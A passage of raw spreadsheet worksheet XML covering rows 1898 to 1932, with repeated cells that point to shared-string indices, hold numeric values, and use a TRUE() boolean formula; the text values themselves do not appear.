      <c r="T1898" t="s">
        <v>7</v>
      </c>
      <c r="U1898" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1899" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1899" s="1">
        <v>18267</v>
      </c>
      <c r="B1899" t="s">
        <v>0</v>
      </c>
      <c r="C1899" t="s">
        <v>78</v>
      </c>
      <c r="D1899" t="s">
        <v>2097</v>
      </c>
      <c r="E1899" t="s">
        <v>1227</v>
      </c>
      <c r="F1899">
        <v>29117300</v>
      </c>
      <c r="G1899" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1899" t="s">
        <v>2237</v>
      </c>
      <c r="K1899">
        <v>0</v>
      </c>
      <c r="L1899" t="s">
        <v>98</v>
      </c>
      <c r="R1899" t="s">
        <v>5</v>
      </c>
      <c r="S1899" t="s">
        <v>1229</v>
      </c>
      <c r="T1899" t="s">
        <v>7</v>
      </c>
      <c r="U1899" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1900" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1900" s="1">
        <v>18268</v>
      </c>
      <c r="B1900" t="s">
        <v>0</v>
      </c>
      <c r="C1900" t="s">
        <v>78</v>
      </c>
      <c r="D1900" t="s">
        <v>2097</v>
      </c>
      <c r="E1900" t="s">
        <v>1227</v>
      </c>
      <c r="F1900">
        <v>29117300</v>
      </c>
      <c r="G1900" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1900" t="s">
        <v>2238</v>
      </c>
      <c r="K1900">
        <v>0</v>
      </c>
      <c r="L1900" t="s">
        <v>98</v>
      </c>
      <c r="R1900" t="s">
        <v>5</v>
      </c>
      <c r="S1900" t="s">
        <v>1229</v>
      </c>
      <c r="T1900" t="s">
        <v>7</v>
      </c>
      <c r="U1900" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1901" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1901" s="1">
        <v>18269</v>
      </c>
      <c r="B1901" t="s">
        <v>0</v>
      </c>
      <c r="C1901" t="s">
        <v>78</v>
      </c>
      <c r="D1901" t="s">
        <v>2097</v>
      </c>
      <c r="E1901" t="s">
        <v>1227</v>
      </c>
      <c r="F1901">
        <v>29117300</v>
      </c>
      <c r="G1901" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1901" t="s">
        <v>2239</v>
      </c>
      <c r="K1901">
        <v>0</v>
      </c>
      <c r="L1901" t="s">
        <v>98</v>
      </c>
      <c r="R1901" t="s">
        <v>5</v>
      </c>
      <c r="S1901" t="s">
        <v>1229</v>
      </c>
      <c r="T1901" t="s">
        <v>7</v>
      </c>
      <c r="U1901" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1902" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1902" s="1">
        <v>18270</v>
      </c>
      <c r="B1902" t="s">
        <v>0</v>
      </c>
      <c r="C1902" t="s">
        <v>78</v>
      </c>
      <c r="D1902" t="s">
        <v>2097</v>
      </c>
      <c r="E1902" t="s">
        <v>1227</v>
      </c>
      <c r="F1902">
        <v>29117300</v>
      </c>
      <c r="G1902" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1902" t="s">
        <v>2240</v>
      </c>
      <c r="K1902">
        <v>0</v>
      </c>
      <c r="L1902" t="s">
        <v>98</v>
      </c>
      <c r="R1902" t="s">
        <v>5</v>
      </c>
      <c r="S1902" t="s">
        <v>1229</v>
      </c>
      <c r="T1902" t="s">
        <v>7</v>
      </c>
      <c r="U1902" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1903" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1903" s="1">
        <v>18271</v>
      </c>
      <c r="B1903" t="s">
        <v>0</v>
      </c>
      <c r="C1903" t="s">
        <v>78</v>
      </c>
      <c r="D1903" t="s">
        <v>2097</v>
      </c>
      <c r="E1903" t="s">
        <v>1227</v>
      </c>
      <c r="F1903">
        <v>29117300</v>
      </c>
      <c r="G1903" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1903" t="s">
        <v>2241</v>
      </c>
      <c r="K1903">
        <v>0</v>
      </c>
      <c r="L1903" t="s">
        <v>98</v>
      </c>
      <c r="R1903" t="s">
        <v>5</v>
      </c>
      <c r="S1903" t="s">
        <v>1229</v>
      </c>
      <c r="T1903" t="s">
        <v>7</v>
      </c>
      <c r="U1903" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1904" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1904" s="1">
        <v>18272</v>
      </c>
      <c r="B1904" t="s">
        <v>0</v>
      </c>
      <c r="C1904" t="s">
        <v>78</v>
      </c>
      <c r="D1904" t="s">
        <v>2097</v>
      </c>
      <c r="E1904" t="s">
        <v>1227</v>
      </c>
      <c r="F1904">
        <v>29117300</v>
      </c>
      <c r="G1904" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1904" t="s">
        <v>2242</v>
      </c>
      <c r="K1904">
        <v>0</v>
      </c>
      <c r="L1904" t="s">
        <v>98</v>
      </c>
      <c r="R1904" t="s">
        <v>5</v>
      </c>
      <c r="S1904" t="s">
        <v>1229</v>
      </c>
      <c r="T1904" t="s">
        <v>7</v>
      </c>
      <c r="U1904" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1905" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1905" s="1">
        <v>18273</v>
      </c>
      <c r="B1905" t="s">
        <v>0</v>
      </c>
      <c r="C1905" t="s">
        <v>78</v>
      </c>
      <c r="D1905" t="s">
        <v>2097</v>
      </c>
      <c r="E1905" t="s">
        <v>1227</v>
      </c>
      <c r="F1905">
        <v>29117300</v>
      </c>
      <c r="G1905" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1905" t="s">
        <v>2243</v>
      </c>
      <c r="K1905">
        <v>0</v>
      </c>
      <c r="L1905" t="s">
        <v>98</v>
      </c>
      <c r="R1905" t="s">
        <v>5</v>
      </c>
      <c r="S1905" t="s">
        <v>1229</v>
      </c>
      <c r="T1905" t="s">
        <v>7</v>
      </c>
      <c r="U1905" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1906" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1906" s="1">
        <v>18274</v>
      </c>
      <c r="B1906" t="s">
        <v>0</v>
      </c>
      <c r="C1906" t="s">
        <v>78</v>
      </c>
      <c r="D1906" t="s">
        <v>2097</v>
      </c>
      <c r="E1906" t="s">
        <v>1227</v>
      </c>
      <c r="F1906">
        <v>29117300</v>
      </c>
      <c r="G1906" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1906" t="s">
        <v>2244</v>
      </c>
      <c r="K1906">
        <v>0</v>
      </c>
      <c r="L1906" t="s">
        <v>98</v>
      </c>
      <c r="R1906" t="s">
        <v>5</v>
      </c>
      <c r="S1906" t="s">
        <v>1229</v>
      </c>
      <c r="T1906" t="s">
        <v>7</v>
      </c>
      <c r="U1906" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1907" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1907" s="1">
        <v>18275</v>
      </c>
      <c r="B1907" t="s">
        <v>0</v>
      </c>
      <c r="C1907" t="s">
        <v>78</v>
      </c>
      <c r="D1907" t="s">
        <v>2097</v>
      </c>
      <c r="E1907" t="s">
        <v>1227</v>
      </c>
      <c r="F1907">
        <v>29117300</v>
      </c>
      <c r="G1907" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1907" t="s">
        <v>2245</v>
      </c>
      <c r="K1907">
        <v>0</v>
      </c>
      <c r="L1907" t="s">
        <v>98</v>
      </c>
      <c r="R1907" t="s">
        <v>5</v>
      </c>
      <c r="S1907" t="s">
        <v>1229</v>
      </c>
      <c r="T1907" t="s">
        <v>7</v>
      </c>
      <c r="U1907" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1908" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1908" s="1">
        <v>18276</v>
      </c>
      <c r="B1908" t="s">
        <v>0</v>
      </c>
      <c r="C1908" t="s">
        <v>78</v>
      </c>
      <c r="D1908" t="s">
        <v>2097</v>
      </c>
      <c r="E1908" t="s">
        <v>1227</v>
      </c>
      <c r="F1908">
        <v>29117300</v>
      </c>
      <c r="G1908" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1908" t="s">
        <v>2246</v>
      </c>
      <c r="K1908">
        <v>0</v>
      </c>
      <c r="L1908" t="s">
        <v>98</v>
      </c>
      <c r="R1908" t="s">
        <v>5</v>
      </c>
      <c r="S1908" t="s">
        <v>1229</v>
      </c>
      <c r="T1908" t="s">
        <v>7</v>
      </c>
      <c r="U1908" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1909" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1909" s="1">
        <v>18277</v>
      </c>
      <c r="B1909" t="s">
        <v>0</v>
      </c>
      <c r="C1909" t="s">
        <v>1</v>
      </c>
      <c r="D1909" t="s">
        <v>2097</v>
      </c>
      <c r="E1909" t="s">
        <v>1227</v>
      </c>
      <c r="F1909">
        <v>29117300</v>
      </c>
      <c r="G1909" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1909" t="s">
        <v>2247</v>
      </c>
      <c r="K1909">
        <v>0</v>
      </c>
      <c r="L1909" t="s">
        <v>98</v>
      </c>
      <c r="R1909" t="s">
        <v>5</v>
      </c>
      <c r="S1909" t="s">
        <v>1229</v>
      </c>
      <c r="T1909" t="s">
        <v>7</v>
      </c>
      <c r="U1909" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1910" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1910" s="1">
        <v>18278</v>
      </c>
      <c r="B1910" t="s">
        <v>0</v>
      </c>
      <c r="C1910" t="s">
        <v>78</v>
      </c>
      <c r="D1910" t="s">
        <v>2097</v>
      </c>
      <c r="E1910" t="s">
        <v>1227</v>
      </c>
      <c r="F1910">
        <v>29117300</v>
      </c>
      <c r="G1910" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1910" t="s">
        <v>2248</v>
      </c>
      <c r="K1910">
        <v>0</v>
      </c>
      <c r="L1910" t="s">
        <v>98</v>
      </c>
      <c r="R1910" t="s">
        <v>5</v>
      </c>
      <c r="S1910" t="s">
        <v>1229</v>
      </c>
      <c r="T1910" t="s">
        <v>7</v>
      </c>
      <c r="U1910" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1911" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1911" s="1">
        <v>18279</v>
      </c>
      <c r="B1911" t="s">
        <v>0</v>
      </c>
      <c r="C1911" t="s">
        <v>78</v>
      </c>
      <c r="D1911" t="s">
        <v>2097</v>
      </c>
      <c r="E1911" t="s">
        <v>1227</v>
      </c>
      <c r="F1911">
        <v>29117300</v>
      </c>
      <c r="G1911" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1911" t="s">
        <v>2249</v>
      </c>
      <c r="K1911">
        <v>0</v>
      </c>
      <c r="L1911" t="s">
        <v>98</v>
      </c>
      <c r="R1911" t="s">
        <v>5</v>
      </c>
      <c r="S1911" t="s">
        <v>1229</v>
      </c>
      <c r="T1911" t="s">
        <v>7</v>
      </c>
      <c r="U1911" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1912" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1912" s="1">
        <v>18280</v>
      </c>
      <c r="B1912" t="s">
        <v>0</v>
      </c>
      <c r="C1912" t="s">
        <v>1</v>
      </c>
      <c r="D1912" t="s">
        <v>2097</v>
      </c>
      <c r="E1912" t="s">
        <v>1227</v>
      </c>
      <c r="F1912">
        <v>29117300</v>
      </c>
      <c r="G1912" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1912" t="s">
        <v>2250</v>
      </c>
      <c r="K1912">
        <v>0</v>
      </c>
      <c r="L1912" t="s">
        <v>98</v>
      </c>
      <c r="R1912" t="s">
        <v>5</v>
      </c>
      <c r="S1912" t="s">
        <v>1229</v>
      </c>
      <c r="T1912" t="s">
        <v>7</v>
      </c>
      <c r="U1912" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1913" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1913" s="1">
        <v>18281</v>
      </c>
      <c r="B1913" t="s">
        <v>0</v>
      </c>
      <c r="C1913" t="s">
        <v>78</v>
      </c>
      <c r="D1913" t="s">
        <v>2097</v>
      </c>
      <c r="E1913" t="s">
        <v>1227</v>
      </c>
      <c r="F1913">
        <v>29117300</v>
      </c>
      <c r="G1913" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1913" t="s">
        <v>2251</v>
      </c>
      <c r="K1913">
        <v>0</v>
      </c>
      <c r="L1913" t="s">
        <v>98</v>
      </c>
      <c r="R1913" t="s">
        <v>5</v>
      </c>
      <c r="S1913" t="s">
        <v>1229</v>
      </c>
      <c r="T1913" t="s">
        <v>7</v>
      </c>
      <c r="U1913" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1914" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1914" s="1">
        <v>18282</v>
      </c>
      <c r="B1914" t="s">
        <v>0</v>
      </c>
      <c r="C1914" t="s">
        <v>78</v>
      </c>
      <c r="D1914" t="s">
        <v>2097</v>
      </c>
      <c r="E1914" t="s">
        <v>1227</v>
      </c>
      <c r="F1914">
        <v>29117300</v>
      </c>
      <c r="G1914" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1914" t="s">
        <v>2252</v>
      </c>
      <c r="K1914">
        <v>0</v>
      </c>
      <c r="L1914" t="s">
        <v>98</v>
      </c>
      <c r="R1914" t="s">
        <v>5</v>
      </c>
      <c r="S1914" t="s">
        <v>1229</v>
      </c>
      <c r="T1914" t="s">
        <v>7</v>
      </c>
      <c r="U1914" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1915" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1915" s="1">
        <v>18283</v>
      </c>
      <c r="B1915" t="s">
        <v>0</v>
      </c>
      <c r="C1915" t="s">
        <v>78</v>
      </c>
      <c r="D1915" t="s">
        <v>2097</v>
      </c>
      <c r="E1915" t="s">
        <v>1227</v>
      </c>
      <c r="F1915">
        <v>29117300</v>
      </c>
      <c r="G1915" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1915" t="s">
        <v>2253</v>
      </c>
      <c r="K1915">
        <v>0</v>
      </c>
      <c r="L1915" t="s">
        <v>98</v>
      </c>
      <c r="R1915" t="s">
        <v>5</v>
      </c>
      <c r="S1915" t="s">
        <v>1229</v>
      </c>
      <c r="T1915" t="s">
        <v>7</v>
      </c>
      <c r="U1915" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1916" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1916" s="1">
        <v>18284</v>
      </c>
      <c r="B1916" t="s">
        <v>0</v>
      </c>
      <c r="C1916" t="s">
        <v>78</v>
      </c>
      <c r="D1916" t="s">
        <v>2097</v>
      </c>
      <c r="E1916" t="s">
        <v>1227</v>
      </c>
      <c r="F1916">
        <v>29117300</v>
      </c>
      <c r="G1916" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1916" t="s">
        <v>2254</v>
      </c>
      <c r="K1916">
        <v>0</v>
      </c>
      <c r="L1916" t="s">
        <v>98</v>
      </c>
      <c r="R1916" t="s">
        <v>5</v>
      </c>
      <c r="S1916" t="s">
        <v>1229</v>
      </c>
      <c r="T1916" t="s">
        <v>7</v>
      </c>
      <c r="U1916" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1917" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1917" s="1">
        <v>18285</v>
      </c>
      <c r="B1917" t="s">
        <v>0</v>
      </c>
      <c r="C1917" t="s">
        <v>78</v>
      </c>
      <c r="D1917" t="s">
        <v>2097</v>
      </c>
      <c r="E1917" t="s">
        <v>1227</v>
      </c>
      <c r="F1917">
        <v>29117300</v>
      </c>
      <c r="G1917" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1917" t="s">
        <v>2255</v>
      </c>
      <c r="K1917">
        <v>0</v>
      </c>
      <c r="L1917" t="s">
        <v>98</v>
      </c>
      <c r="R1917" t="s">
        <v>5</v>
      </c>
      <c r="S1917" t="s">
        <v>1229</v>
      </c>
      <c r="T1917" t="s">
        <v>7</v>
      </c>
      <c r="U1917" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1918" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1918" s="1">
        <v>18286</v>
      </c>
      <c r="B1918" t="s">
        <v>0</v>
      </c>
      <c r="C1918" t="s">
        <v>78</v>
      </c>
      <c r="D1918" t="s">
        <v>2097</v>
      </c>
      <c r="E1918" t="s">
        <v>1227</v>
      </c>
      <c r="F1918">
        <v>29117300</v>
      </c>
      <c r="G1918" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1918" t="s">
        <v>2256</v>
      </c>
      <c r="K1918">
        <v>0</v>
      </c>
      <c r="L1918" t="s">
        <v>98</v>
      </c>
      <c r="R1918" t="s">
        <v>5</v>
      </c>
      <c r="S1918" t="s">
        <v>1229</v>
      </c>
      <c r="T1918" t="s">
        <v>7</v>
      </c>
      <c r="U1918" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1919" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1919" s="1">
        <v>18287</v>
      </c>
      <c r="B1919" t="s">
        <v>0</v>
      </c>
      <c r="C1919" t="s">
        <v>78</v>
      </c>
      <c r="D1919" t="s">
        <v>2097</v>
      </c>
      <c r="E1919" t="s">
        <v>1227</v>
      </c>
      <c r="F1919">
        <v>29117300</v>
      </c>
      <c r="G1919" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1919" t="s">
        <v>2257</v>
      </c>
      <c r="K1919">
        <v>0</v>
      </c>
      <c r="L1919" t="s">
        <v>98</v>
      </c>
      <c r="R1919" t="s">
        <v>5</v>
      </c>
      <c r="S1919" t="s">
        <v>1229</v>
      </c>
      <c r="T1919" t="s">
        <v>7</v>
      </c>
      <c r="U1919" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1920" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1920" s="1">
        <v>18288</v>
      </c>
      <c r="B1920" t="s">
        <v>0</v>
      </c>
      <c r="C1920" t="s">
        <v>78</v>
      </c>
      <c r="D1920" t="s">
        <v>2097</v>
      </c>
      <c r="E1920" t="s">
        <v>1227</v>
      </c>
      <c r="F1920">
        <v>29117300</v>
      </c>
      <c r="G1920" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1920" t="s">
        <v>2258</v>
      </c>
      <c r="K1920">
        <v>0</v>
      </c>
      <c r="L1920" t="s">
        <v>98</v>
      </c>
      <c r="R1920" t="s">
        <v>5</v>
      </c>
      <c r="S1920" t="s">
        <v>1229</v>
      </c>
      <c r="T1920" t="s">
        <v>7</v>
      </c>
      <c r="U1920" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1921" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1921" s="1">
        <v>18289</v>
      </c>
      <c r="B1921" t="s">
        <v>0</v>
      </c>
      <c r="C1921" t="s">
        <v>78</v>
      </c>
      <c r="D1921" t="s">
        <v>2097</v>
      </c>
      <c r="E1921" t="s">
        <v>1227</v>
      </c>
      <c r="F1921">
        <v>29117300</v>
      </c>
      <c r="G1921" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1921" t="s">
        <v>2259</v>
      </c>
      <c r="K1921">
        <v>0</v>
      </c>
      <c r="L1921" t="s">
        <v>98</v>
      </c>
      <c r="R1921" t="s">
        <v>5</v>
      </c>
      <c r="S1921" t="s">
        <v>1229</v>
      </c>
      <c r="T1921" t="s">
        <v>7</v>
      </c>
      <c r="U1921" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1922" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1922" s="1">
        <v>18290</v>
      </c>
      <c r="B1922" t="s">
        <v>0</v>
      </c>
      <c r="C1922" t="s">
        <v>78</v>
      </c>
      <c r="D1922" t="s">
        <v>2097</v>
      </c>
      <c r="E1922" t="s">
        <v>1227</v>
      </c>
      <c r="F1922">
        <v>29117300</v>
      </c>
      <c r="G1922" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1922" t="s">
        <v>2260</v>
      </c>
      <c r="K1922">
        <v>0</v>
      </c>
      <c r="L1922" t="s">
        <v>98</v>
      </c>
      <c r="R1922" t="s">
        <v>5</v>
      </c>
      <c r="S1922" t="s">
        <v>1229</v>
      </c>
      <c r="T1922" t="s">
        <v>7</v>
      </c>
      <c r="U1922" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1923" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1923" s="1">
        <v>18291</v>
      </c>
      <c r="B1923" t="s">
        <v>0</v>
      </c>
      <c r="C1923" t="s">
        <v>78</v>
      </c>
      <c r="D1923" t="s">
        <v>2097</v>
      </c>
      <c r="E1923" t="s">
        <v>1227</v>
      </c>
      <c r="F1923">
        <v>29117300</v>
      </c>
      <c r="G1923" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1923" t="s">
        <v>2261</v>
      </c>
      <c r="K1923">
        <v>0</v>
      </c>
      <c r="L1923" t="s">
        <v>98</v>
      </c>
      <c r="R1923" t="s">
        <v>5</v>
      </c>
      <c r="S1923" t="s">
        <v>1229</v>
      </c>
      <c r="T1923" t="s">
        <v>7</v>
      </c>
      <c r="U1923" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1924" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1924" s="1">
        <v>18292</v>
      </c>
      <c r="B1924" t="s">
        <v>0</v>
      </c>
      <c r="C1924" t="s">
        <v>78</v>
      </c>
      <c r="D1924" t="s">
        <v>2097</v>
      </c>
      <c r="E1924" t="s">
        <v>1227</v>
      </c>
      <c r="F1924">
        <v>29117300</v>
      </c>
      <c r="G1924" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1924" t="s">
        <v>2262</v>
      </c>
      <c r="K1924">
        <v>0</v>
      </c>
      <c r="L1924" t="s">
        <v>98</v>
      </c>
      <c r="R1924" t="s">
        <v>5</v>
      </c>
      <c r="S1924" t="s">
        <v>1229</v>
      </c>
      <c r="T1924" t="s">
        <v>7</v>
      </c>
      <c r="U1924" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1925" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1925" s="1">
        <v>18293</v>
      </c>
      <c r="B1925" t="s">
        <v>0</v>
      </c>
      <c r="C1925" t="s">
        <v>78</v>
      </c>
      <c r="D1925" t="s">
        <v>2097</v>
      </c>
      <c r="E1925" t="s">
        <v>1227</v>
      </c>
      <c r="F1925">
        <v>29117300</v>
      </c>
      <c r="G1925" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1925" t="s">
        <v>2263</v>
      </c>
      <c r="K1925">
        <v>0</v>
      </c>
      <c r="L1925" t="s">
        <v>98</v>
      </c>
      <c r="R1925" t="s">
        <v>5</v>
      </c>
      <c r="S1925" t="s">
        <v>1229</v>
      </c>
      <c r="T1925" t="s">
        <v>7</v>
      </c>
      <c r="U1925" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1926" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1926" s="1">
        <v>18294</v>
      </c>
      <c r="B1926" t="s">
        <v>0</v>
      </c>
      <c r="C1926" t="s">
        <v>78</v>
      </c>
      <c r="D1926" t="s">
        <v>2097</v>
      </c>
      <c r="E1926" t="s">
        <v>1227</v>
      </c>
      <c r="F1926">
        <v>29117300</v>
      </c>
      <c r="G1926" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1926" t="s">
        <v>2264</v>
      </c>
      <c r="K1926">
        <v>0</v>
      </c>
      <c r="L1926" t="s">
        <v>98</v>
      </c>
      <c r="R1926" t="s">
        <v>5</v>
      </c>
      <c r="S1926" t="s">
        <v>1229</v>
      </c>
      <c r="T1926" t="s">
        <v>7</v>
      </c>
      <c r="U1926" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1927" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1927" s="1">
        <v>18295</v>
      </c>
      <c r="B1927" t="s">
        <v>0</v>
      </c>
      <c r="C1927" t="s">
        <v>1</v>
      </c>
      <c r="D1927" t="s">
        <v>2097</v>
      </c>
      <c r="E1927" t="s">
        <v>1227</v>
      </c>
      <c r="F1927">
        <v>29117300</v>
      </c>
      <c r="G1927" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1927" t="s">
        <v>2265</v>
      </c>
      <c r="K1927">
        <v>0</v>
      </c>
      <c r="L1927" t="s">
        <v>98</v>
      </c>
      <c r="R1927" t="s">
        <v>5</v>
      </c>
      <c r="S1927" t="s">
        <v>1229</v>
      </c>
      <c r="T1927" t="s">
        <v>7</v>
      </c>
      <c r="U1927" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1928" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1928" s="1">
        <v>18296</v>
      </c>
      <c r="B1928" t="s">
        <v>0</v>
      </c>
      <c r="C1928" t="s">
        <v>78</v>
      </c>
      <c r="D1928" t="s">
        <v>2097</v>
      </c>
      <c r="E1928" t="s">
        <v>1227</v>
      </c>
      <c r="F1928">
        <v>29117300</v>
      </c>
      <c r="G1928" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1928" t="s">
        <v>2266</v>
      </c>
      <c r="K1928">
        <v>0</v>
      </c>
      <c r="L1928" t="s">
        <v>98</v>
      </c>
      <c r="R1928" t="s">
        <v>5</v>
      </c>
      <c r="S1928" t="s">
        <v>1229</v>
      </c>
      <c r="T1928" t="s">
        <v>7</v>
      </c>
      <c r="U1928" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1929" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1929" s="1">
        <v>18297</v>
      </c>
      <c r="B1929" t="s">
        <v>0</v>
      </c>
      <c r="C1929" t="s">
        <v>78</v>
      </c>
      <c r="D1929" t="s">
        <v>2097</v>
      </c>
      <c r="E1929" t="s">
        <v>1227</v>
      </c>
      <c r="F1929">
        <v>29117300</v>
      </c>
      <c r="G1929" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1929" t="s">
        <v>2267</v>
      </c>
      <c r="K1929">
        <v>0</v>
      </c>
      <c r="L1929" t="s">
        <v>98</v>
      </c>
      <c r="R1929" t="s">
        <v>5</v>
      </c>
      <c r="S1929" t="s">
        <v>1229</v>
      </c>
      <c r="T1929" t="s">
        <v>7</v>
      </c>
      <c r="U1929" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1930" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1930" s="1">
        <v>18298</v>
      </c>
      <c r="B1930" t="s">
        <v>0</v>
      </c>
      <c r="C1930" t="s">
        <v>78</v>
      </c>
      <c r="D1930" t="s">
        <v>2097</v>
      </c>
      <c r="E1930" t="s">
        <v>1227</v>
      </c>
      <c r="F1930">
        <v>29117300</v>
      </c>
      <c r="G1930" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1930" t="s">
        <v>2268</v>
      </c>
      <c r="K1930">
        <v>0</v>
      </c>
      <c r="L1930" t="s">
        <v>98</v>
      </c>
      <c r="R1930" t="s">
        <v>5</v>
      </c>
      <c r="S1930" t="s">
        <v>1229</v>
      </c>
      <c r="T1930" t="s">
        <v>7</v>
      </c>
      <c r="U1930" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1931" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1931" s="1">
        <v>18299</v>
      </c>
      <c r="B1931" t="s">
        <v>0</v>
      </c>
      <c r="C1931" t="s">
        <v>78</v>
      </c>
      <c r="D1931" t="s">
        <v>2097</v>
      </c>
      <c r="E1931" t="s">
        <v>1227</v>
      </c>
      <c r="F1931">
        <v>29117300</v>
      </c>
      <c r="G1931" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1931" t="s">
        <v>2269</v>
      </c>
      <c r="K1931">
        <v>0</v>
      </c>
      <c r="L1931" t="s">
        <v>98</v>
      </c>
      <c r="R1931" t="s">
        <v>5</v>
      </c>
      <c r="S1931" t="s">
        <v>1229</v>
      </c>
      <c r="T1931" t="s">
        <v>7</v>
      </c>
      <c r="U1931" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1932" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1932" s="1">
        <v>18300</v>
      </c>
      <c r="B1932" t="s">
        <v>0</v>
      </c>
      <c r="C1932" t="s">
        <v>78</v>
      </c>
      <c r="D1932" t="s">
        <v>2097</v>
      </c>
      <c r="E1932" t="s">
        <v>1227</v>
      </c>
      <c r="F1932">
        <v>29117300</v>
      </c>
      <c r="G1932" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1932" t="s">
        <v>2270</v>
      </c>
      <c r="K1932">
        <v>0</v>
      </c>
      <c r="L1932" t="s">
        <v>98</v>
      </c>
      <c r="R1932" t="s">
        <v>5</v>
      </c>
      <c r="S1932" t="s">
        <v>1229</v>
      </c>
      <c r="T1932" t="s">
        <v>7</v>
      </c>
